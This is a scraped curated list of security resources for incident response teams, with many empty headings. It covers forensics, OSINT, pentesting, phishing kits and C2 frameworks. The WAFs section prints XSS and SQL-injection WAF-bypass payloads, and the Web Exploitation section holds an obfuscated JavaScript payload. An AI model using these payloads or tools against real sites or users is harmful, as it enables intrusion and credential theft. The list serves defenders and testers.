Spacial / Awesome Csirt

Licence: gpl-3.0
Awesome CSIRT is a curated list of links and resources for security and CSIRT daily activities.


CSIRT Awesome

Please contribute through pull requests ;)

Another great list: awesome-incident-response

Books

Links

Hashing

CVEs

  • Some CVEs stuff and links here and in here
  • MikroTik search on shodan.
  • TROMMEL: Sift Through Directories of Files to Identify Indicators That May Contain Vulnerabilities
  • cve_manager: A python script that a) parses NIST NVD CVEs, b) processes and exports them to CSV files, c) creates a postgres database and imports all the data into it, d) provides query capabilities for this CVE database.
  • dorkbot: Command-line tool to scan Google search results for vulnerabilities.

Malware Analysis

Web Malwares

Samples

Repos

  • A repository of LIVE malwares for your own joy and pleasure: theZoo
  • malware.one is a binary substring searchable malware catalog containing terabytes of malicious code.
  • Beginner Malware Reversing Challenges, by MalwareTech. repo
  • MalwareWorld: Check for Suspicious Domains and IPs. Repo: MalwareWorld: System based on +500 blacklists and 5 external intelligences to detect potentially malicious internet hosts
  • C2Matrix: The goal of this site is to point you to the best C2 framework for your needs based on your adversary emulation plan and the target environment
  • LOLBITS: C2 framework that uses Background Intelligent Transfer Service (BITS) as communication protocol and Direct Syscalls + Dinvoke for EDR user-mode hooking evasion.
  • MalwareBazaar: is a project from abuse.ch with the goal of sharing malware samples with the infosec community, AV vendors and threat intelligence providers.
  • What is MWDB Core? mwdb-core: Malware repository component for samples & static configuration with REST API interface.

Ransomwares

Virus/Anti-Virus

Trojans/Loggers

Malware Articles and Sources

Reverse Engineering

Decompilers

Yara

Ghidra

Frameworks

Patching

  • Did Microsoft Just Manually Patch Their Equation Editor Executable? Why Yes, Yes They Did. (CVE-2017-11882)

Hardening

WebServers

Credentials

Tokens

Secure Programming

Web Training

SAST

Secure Web dev

Formal Analysis

Fuzzing

API

REST

CTFs

CTFs tools

  • CTFs-Exploits
  • nc-chat-ctf: Chat Server for CTF Players wrapped in SSL.
  • thg-framework
  • Super-Guesser-ctf
  • Ciphr: CLI crypto swiss-army knife for performing and composing encoding, decoding, encryption, decryption, hashing, and other various cryptographic operations on streams of data from the command line; mostly intended for ad hoc, infosec-related uses.

Phreak

Archs

Hardware

ARM

Pentesting

Reconnaissance

Enumeration

  • linux-smart-enumeration: Linux enumeration tool for pentesting and CTFs with verbosity levels
  • Ethical Hacking Course: Enumeration Theory
  • Sublist3r: Fast subdomains enumeration tool for penetration testers
  • subscraper: External pentest tool that performs subdomain enumeration through various techniques. In addition, SubScraper will provide information such as HTTP & DNS lookups to aid in potential next steps.
  • massh-enum: OpenSSH 7.x Mass Username Enumeration.
  • LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks
  • linpostexp: Linux post exploitation enumeration and exploit checking tools
  • Social Mapper - A Social Media Enumeration & Correlation Tool. github repo
  • The art of subdomain enumeration: This repository contains all the supplement material for the book "The art of sub-domain enumeration".
  • social_mapper: A Social Media Enumeration & Correlation Tool by Jacob Wilkin(Greenwolf)
  • LEGION - Automatic Enumeration Tool
  • discover - Custom bash scripts used to automate various penetration testing tasks including recon, scanning, parsing, and creating malicious payloads and listeners with Metasploit.
  • Z/OS System Enumeration Scripts: PoC REXX Script to Help with z/OS System enumeration via OMVS/TSO/JCL.
  • WPExploitation: simple scripts to help with Windows enumeration.
  • CTFR uses neither dictionary attacks nor brute force; it just abuses Certificate Transparency logs.
  • feroxbuster: A fast, simple, recursive content discovery tool written in Rust.
  • grinder: Python framework to automatically discover and enumerate hosts from different back-end systems (Shodan, Censys)
  • Admin-Scanner: This tool is to design to find admin panel of websites.
  • Virtual host scanner: A script to enumerate virtual hosts on a server.
  • vhost-brute: A PHP tool to brute force vhost configured on a server.
  • grab_beacon_config: nmap script to get beacon info.
  • assetfinder: Find domains and subdomains related to a given domain.
  • Wordlists:

WebShells

ShellCodes

Reporting

OSINT - Open Source INTelligence

OSINT Webscraping

  • OSINT framework focused on gathering information from free tools or resources.
  • h8mail: Password Breach Hunting & Email OSINT tool, locally or using premium services. Supports chasing down related email
  • PwnBin: Python Pastebin Webcrawler that returns list of public pastebins containing keywords
  • ODBParser: OSINT tool to search, parse and dump only the open Elasticsearch and MongoDB directories.
  • pastego: Scrape/Parse Pastebin using GO and expression grammar (PEG)
  • Instagram Scraper: Scrapes an instagram user's photos and videos

OSINT Chats

  • chatter: internet monitoring osint telegram bot for windows
  • Slackhound: Slackhound allows red and blue teams to perform fast reconnaissance on Slack workspaces/organizations to quickly search user profiles, locations, files, and other objects.
  • ail-feeder-telegram: External telegram feeder for AIL framework.

Vulnerability

WAFs

'';!--"<XSS>=&{()}

<IMG SRC="javascript:alert('XSS');">

<IMG SRC="jav&#x09;ascript:alert('XSS');">

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

<IMG SRC="jav&#x0D;ascript:alert('XSS');">

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  • CloudFlare XSS Bypass:
<svg
onload=alert%26%230000000040
"1")>
SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`

Exploits

Bug Bounty

curl -s URL | grep -Po "(\/)((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)*((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)((?:[a-zA-Z\-_\/\:\.0-9\{\}]+))" | sort -u

Web Exploitation

𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()
Burp Suite

Red Team

Command & Control (C2)

Purple Team

  • Purple Cloud: An Infrastructure as Code (IaC) deployment of a small Active Directory pentest lab in the cloud. The deployment simulates a semi-realistic corporate enterprise Active Directory with a DC and endpoints. Purple team goals include blue team detection capabilities and R&D for detection engineering new approaches. On kiploit

DNS

Exfiltration

Payloads

Phishing

  • Phishing on Twitter
  • evilginx2: Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication.
  • shellphish: Phishing Tool for 18 social media: Instagram, Facebook, Snapchat, Github, Twitter, Yahoo, Protonmail, Spotify, Netflix, Linkedin, Wordpress, Origin, Steam, Microsoft, InstaFollowers, Gitlab, Pinterest
  • pompa: Fully-featured spear-phishing toolkit - web front-end.
  • Modlishka: Modlishka is a flexible and powerful reverse proxy that will take your phishing campaigns to the next level (with minimal effort required from your side).
  • Using phishing tools against the phishers — and uncovering a massive Binance phishing campaign.
  • Lure: User Recon Automation for GoPhish
  • PhishingKitTracker: An extensible and freshly updated collection of phishingkits for forensics and future analysis topped with simple stats.
  • SimplyTemplate: Phishing Template Generation Made Easy.

Forensics

  • Cracking Linux Full Disk Encryption (LUKS) with hashcat - The Forensic way!
  • O-Saft: OWASP SSL advanced forensic tool
  • PcapXray - A Network Forensics Tool - To visualize a Packet Capture offline as a Network Diagram including device identification, highlight important communication and file extraction
  • swap_digger is a tool used to automate Linux swap analysis during post-exploitation or forensics
  • The Sleuth Kit® (TSK) is a library and collection of command line digital forensics tools that allow you to investigate volume and file system data
  • Invoke-LiveResponse
  • Linux Forensics
  • CDQR: The Cold Disk Quick Response (CDQR) tool is a fast and easy to use forensic artifact parsing tool that works on disk images, mounted drives and extracted artifacts from Windows, Linux and MacOS devices
  • mac_apt: macOS Artifact Parsing Tool
  • MacForensics: Repository of scripts for processing various artifacts from macOS (formerly OSX).
  • imago-forensics: Imago is a python tool that extracts digital evidence from images.
  • remedi-infrastructure: setup and deployment code for setting up a REMEDI machine translation cluster
  • Tsurugi Linux is a new DFIR open source project that is and will be totally free, independent without involving any commercial brand
  • libelfmaster: Secure ELF parsing/loading library for forensics reconstruction of malware, and robust reverse engineering tools
  • usbrip (derived from "USB Ripper", not "USB R.I.P." 😲) is an open source forensics tool with CLI interface that lets you keep track of USB device artifacts (aka USB event history, "Connected" and "Disconnected" events) on Linux machines.
  • Digital Forensics and Incident Response: This post is inspired by all the hard working DFIR, and more broadly security professionals, who have put in the hard yards over the years to discuss in depth digital forensics and incident response.
  • KAPE - Kroll Artifact Parser And Extractor: Find, collect and process forensically useful artifacts in minutes. blog post. KAPE docs and KAPE Files
  • AVML(Acquire Volatile Memory for Linux).
  • turbinia: Automation and Scaling of Digital Forensics Tools
  • Eric Zimmerman's Tools
  • MacQuisition: A powerful, 4-in-1 forensic imaging software solution for Macs for triage, live data acquisition, targeted data collection, and forensic imaging.
  • Kuiper: Digital Forensics Investigation Platform
  • file Signatures:
  • PowerForensics: PowerForensics provides an all in one platform for live disk forensic analysis. Powershell
  • OfficeForensicTools: A set of tools for collecting forensic information.

Distros

Volatility

Blue Team

Threat Hunting

MISP

APT - Advanced Persistent Threat

IoCs

SIEM

Browsers

Browsers Addons

Operating Systems

UEFI

Windows

Active Directory

Mimikatz

Powershell

Office and O/365

macOS/iOS

Android

Linux/ *Nix

Cloud

AWS

Risk Assessment and Vulnerability Management

Guidelines

ICS (SCADA)

Radio

Satellite

Social Engineering

Tools

Note-taking

  • SwiftnessX: A cross-platform note-taking & target-tracking app for penetration testers.

Kali

  • hurl: hexadecimal & URL encoder + decoder. Package Description: hURL is a small utility that can encode and decode between multiple formats.

IP Reputation

Shell tools

  • Python-Scripts: some scripts for penetration testing.
  • SubEnum: bash script for Subdomain Enumeration
  • password-store: Simple password manager using gpg and ordinary unix directories.

Search Engines

VPN

  • jigsaw project by Alphabet/Google. Outline: VPN Server.
  • SSHuttle: Transparent proxy server that works as a poor man's VPN. Forwards over ssh. Doesn't require admin. Works with Linux and MacOS. Supports DNS tunneling.
  • WireGuard: is an extremely simple yet fast and modern VPN that utilizes state-of-the-art cryptography. It aims to be faster, simpler, leaner, and more useful than IPSec, while avoiding the massive headache.
  • Crockford’s base 32 encoding: Crockford’s base 32 encoding is a compromise between efficiency and human legibility.
  • Sputnik -An Open Source Intelligence Browser Extension
  • PCredz: This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.
  • uncaptcha2: defeating the latest version of ReCaptcha with 91% accuracy
  • Nefarious LinkedIn: A look at how LinkedIn spies on its users.
  • ProtonVPN-CLI: Linux command-line client for ProtonVPN. Written in Python.

Secure Sharing

  • CryFS: Keep your data safe in the cloud. code
  • Cryptomator: Multi-platform transparent client-side encryption of your files in the cloud. code
  • VeraCrypt: is a free open source disk encryption software for Windows, Mac OSX and Linux.
  • CipherShed: is a program that can be used to create encrypted files or encrypt entire drives (including USB flash drives and external HDDs). code
  • Boxcryptor: Security for your Cloud.
  • Nextcloud E2E: End-to-end encryption RFC. Some old news about it
  • DiskCryptor is an open encryption solution that offers encryption of all disk partitions, including the system partition. code
  • ProjectSend is a free, open source software that lets you share files with your clients, focused on ease of use and privacy. It supports clients groups, system users roles, statistics, multiple languages, detailed logs... and much more!

Privacy

General

Configs


Training and Certifications

Conferences and Slides


Sources

Some good places to visit:


Fun


CFPs

2018

Articles


Other Repos
